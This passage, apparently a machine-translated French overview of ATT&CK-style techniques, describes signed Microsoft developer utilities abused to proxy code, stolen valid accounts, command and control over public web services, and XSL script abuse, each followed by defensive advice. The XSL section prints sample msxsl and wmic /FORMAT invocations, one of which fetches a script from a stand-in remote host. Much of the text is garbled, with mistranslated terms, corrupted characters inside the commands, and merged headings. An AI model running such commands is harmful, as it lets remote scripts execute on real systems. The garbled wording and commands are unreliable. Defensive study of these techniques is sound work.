souvent signés avec des certificats numériques qui leur permettent de proxyer du code malveillant dans le système d'exploitation, en contournant les mécanismes de sécurité et les feuilles blanches d'applications.• MSBulid est une plate-forme de développement logiciel utilisée dans Visual Studio. Il utilise des projets sous forme de fichiers XML qui décrivent les exigences pour la construction de diverses plates-formes et configurations. MSBuild de .NET version 4 vous permet d'insérer du code C # dans un projet XML, de le compiler, puis de l'exécuter. MSBulid.exe est signé par Microsoft Digital Certificate.• DNX - .Net Execution Environmant (dnx.exe) est un kit de développement pour Visual Studio Enterprise. Arrêté depuis la CLI .NET Core en 2016. DNX est absent des versions standard de Windows et ne peut être présent que sur les hôtes développeurs lors de l'utilisation de .Net Core et ASP.NET Core 1.0. Dnx.exe est signé numériquement et peut être utilisé pour exécuter du code proxy.• RCSI est une interface de ligne de commande non interactive pour C #, similaire à csi.exe. Il a été introduit dans une version antérieure de la plate-forme de compilation Roslyn .Net. Rcsi.exe est signé par Microsoft Digital Certificate. Les fichiers de script C # .csx peuvent être écrits et exécutés à l'aide de Rcsi.exe à l'invite de commandes Windows.• WinDbg / CDB est le noyau MS Windows et un utilitaire de débogage en mode utilisateur. Le débogueur de console Microsoft cdb.exe est également un débogueur en mode utilisateur. Les deux utilitaires peuvent être utilisés comme des outils autonomes. Couramment utilisé dans le développement de logiciels, l'ingénierie inverse et ne peut pas être trouvé sur les systèmes Windows standard. Les fichiers WinDbg.exe et CDB.exe sont signés par Microsoft Digital Certificate et peuvent être utilisés pour le code proxy.• Tracker - utilitaire de suivi des fichiers tracker.exe. Inclus dans .NET dans le cadre de MSBuild. Utilisé pour enregistrer les appels dans le système de fichiers Windows 10. Les attaquants peuvent utiliser tracker.exe pour exécuter DLL dans divers processus. Tracker.exe est également signé avec un certificat Microsoft.Recommandations de protection: Tous les fichiers ci-dessus sont susceptibles d'être supprimés du système, s'ils ne sont pas utilisés aux fins prévues par les utilisateurs.Description: les attaquants peuvent voler les informations d'identification d'un compte d'utilisateur ou de service spécifique à l'aide des informations d'identification d'accès, capturer les informations d'identification dans le processus de renseignement à l'aide de l'ingénierie sociale. Les informations d'identification compromises peuvent être utilisées pour contourner les systèmes de contrôle d'accès et accéder aux systèmes distants et aux services externes, tels que VPN, OWA, Bureau à distance, ou pour obtenir des privilèges élevés sur des systèmes et des zones spécifiques du réseau. Si le scénario réussit, les attaquants peuvent refuser les logiciels malveillants et les rendre difficiles à détecter. En outre, les attaquants peuvent créer des comptes en utilisant des noms et des mots de passe prédéfinis pour maintenir l'accès à la sauvegarde en cas de tentatives infructueuses d'utiliser d'autres moyens.Recommandations de protection: appliquez une politique de mot de passe, suivez les recommandations de conception et d'administration d'un réseau d'entreprise pour limiter l'utilisation des comptes privilégiés à tous les niveaux administratifs. Vérifications régulières des comptes de domaine et locaux et de leurs droits afin d'identifier ceux qui pourraient permettre à un attaquant d'obtenir un large accès. Suivi de l'activité du compte à l'aide des systèmes SIEM.Système: Droits Windows : UtilisateurDescription: Les attaquants peuvent utiliser un service Web externe légitime en cours d'exécution comme moyen d'envoyer des commandes pour contrôler un système infecté. Les serveurs de gestion sont appelés Commandement et contrôle (C&C ou C2). Les sites Web et les réseaux sociaux populaires peuvent servir de mécanisme pour C2, et divers services publics tels que Google ou Twitter peuvent également être utilisés. Tout cela permet de masquer les activités malveillantes dans le flux de trafic global. Les services Web utilisent généralement SSL / TLS, de sorte que les adversaires bénéficient d'une couche de protection supplémentaire.Recommandations de protection:Les pare-feu et les proxys Web peuvent être utilisés pour mettre en œuvre des politiques de communication réseau externes. Les systèmes IDS / IPS utilisant l'analyse de signature peuvent détecter des logiciels malveillants connus au niveau du réseau. Cependant, il convient de considérer qu'au fil du temps, les opposants modifieront les signatures de l'outil C2 ou reconstruiront les protocoles de manière à éviter la détection à l'aide des défenses couramment utilisées. L'utilisation d'outils pour surveiller le comportement des utilisateurs peut également augmenter les chances de détecter une activité anormale.Système: Droits Windows : Description de l' utilisateur:Le langage de feuille de style extensible (* .xsl) est généralement utilisé pour décrire le traitement et le rendu des données dans des fichiers XML. Pour prendre en charge des opérations complexes en XSL, il est possible d'incorporer des scripts dans différentes langues dans le code. Les attaquants peuvent abuser de cette fonctionnalité pour exécuter des fichiers arbitraires. Semblable à la technique d'abus des utilitaires de développeur de confiance (Trusted Developer Utilities), l'utilitaire de confiance msxsl.exe, qui convertit un document XML sous une autre forme (html, wml, rtf, pdf, etc.) peut être utilisé pour exécuter du JavaScript malveillant intégré dans le local ou supprimé (référencé via URL) les fichiers XSL. Étant donné que msxsl.exe n'est pas installé par défaut, l'adversaire devra très probablement le compresser et les autres fichiers nécessaires. Exemple d'appel msxsl.exe:clients msxsl.exe [.] script xml [.] xsl .Une autre variante de cette technique, appelée Squablytwo, consiste à utiliser WMI pour appeler JScript ou VBScript à partir d'un fichier xsl. Dans cette technique, comme Squiblydoo, qui abuse de regsrv32.exe, les outils de confiance Windows sont également utilisés:• Fichier local: liste de processus wmic /FORMAT:evil►.†xsl;• Fichier distant: wmic os get / FORMAT : decisionhttps [ : ; // exemple [. †com / evil [. †xsl. "Recommandations de protection: si msxsl.exe n'est pas utilisé dans l'environnement protégé, bloquez son exécution. La désactivation de WMI, au contraire, peut entraîner une instabilité du système et nécessite donc une évaluation préliminaire des conséquences.